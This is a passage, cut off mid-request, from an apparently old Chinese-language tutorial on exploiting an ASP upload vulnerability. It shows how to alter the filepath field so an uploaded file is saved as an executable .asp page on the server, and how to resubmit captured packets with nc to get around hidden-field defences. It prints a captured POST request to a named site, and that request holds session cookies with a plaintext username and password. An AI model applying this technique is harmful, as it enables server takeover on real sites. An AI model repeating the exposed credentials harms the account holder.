background image

这个

data 数组长度是 4:bbs

如果我们构造

filepath 如下,会怎么样呢?

filepath="/newmm.asp"
我们在

2004.09.24.08.24 传的文件就会发生变化

没有改时

:

_blank>http://www.***.com/bbs/uploadface/200409240824.jpg
用我们构造的

filepath 时:

_blank>http://www.***.com/newmm.asp/200409240824.jpg
这样当服务器接收

filepath 数据时,检测到 newmm.asp 后面的

就理解为

filepath 的数据就结束了

这样我们上传的文件

,比如 c:.asp

就保存成

:_blank>http://www.***.com/newmm.asp

3:后期补充
漏洞公布以后很多网站做了相应的处理

,但是对于 filepath 的过滤和处理都不行

有很多网站只是加了

n 个 hiden 属性的变量对付网上公布的 upfile.exe 就是那个

上传漏洞利用工具或者

filepath 变量利用工具(老兵的)...但是最基本的没改啊。。

而且很对网站的插件里有类似的漏洞

,我要说的不要依赖哪些专门的工具

自己改

wse 抓到的包里的 filepath 变量,然后在用 nc 提交。。。

就算他加

n 个 hiden 变量也于事无补。

当然

,如果对 filepath 做了很严格的过滤的话我们的这些理论就将宣告终结

就是我们的新理论诞生的时候

!

4:详细实例:
---------------------
一、

wse 抓包结果(存到 1.txt 里):

post/bbs/upphoto/upfile.asphttp/1.1
accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-
flash,application/vnd.ms-Excel,application/vnd.ms-powERPoint,application/msword,*/*
referer:_blank>http://www.xin126.com/bbs/upphoto/upload.asp
accept-language:zh-cn
content-type:multipart/form-data;boundary=-----------7d423a138d0278
accept-encoding:gzip,deflate
user-agent:mozilla/4.0(compatible;msie6.0;Windowsnt5.1;.netclr1.1.4322)
host:_blank>www.xin126.com
content-length:1969
connection:keep-alive
cache-control:no-cache
cookie:aspsessionidaccccdcs=njhcphpalbcankobechkjanf;iscome=1;gamvancookies=1;regtime=20
04-9-24 
3:39:37;username=szjwwwww;pass=5211314;dl=0;userid=62;ltstyle=0;logintry=1;userpass=eb03
f6c72908fd84

-----------------------------7d423a138d0278
content-disposition:form-data;name="filepath"